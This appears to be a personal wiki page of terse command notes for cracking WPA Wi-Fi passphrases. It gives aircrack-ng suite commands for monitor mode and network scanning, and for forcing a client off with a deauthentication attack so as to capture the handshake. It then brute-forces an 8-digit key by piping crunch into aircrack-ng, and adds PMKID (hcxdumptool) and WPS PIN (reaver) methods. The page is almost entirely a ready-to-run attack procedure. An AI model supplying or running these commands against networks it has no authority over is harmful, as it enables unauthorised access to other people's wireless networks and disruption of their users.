1682796065
🔥 Also delete old pages
1.1 KiB
1.1 KiB
Monitor mode
For my RTL8188EUS:
ip link set wlanX down
iw dev wlanX set type monitor
Scan networks
All channels:
airodump-ng wlanX
Specific channel:
airodump-ng -c 6 wlanX
Save a capture of chosen BSSID
airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
You need to wait for a client to connect, or to deauth it and get the 4-way handshake.
aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
-a
is access point
-c
is client
Then you should have an EAPOL/WPA handshake.
Crack WPA passphrase
For a 8 digits scheme
crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
Wireshark
PSK Generator: https://www.wireshark.org/tools/wpa-psk.html
PMKID method
hcxdumptool -i wlanX -o PMKID --enable_status=1
TODO...
WPS method
AP must have WPS enabled with a PIN. Not PBC, push button.
reaver -i wlanX -b 00:23:B1:82:84:xx
Resources
https://github.com/ZerBea/hcxdumptool
https://github.com/ZerBea/hcxtools
https://wpa-sec.stanev.org/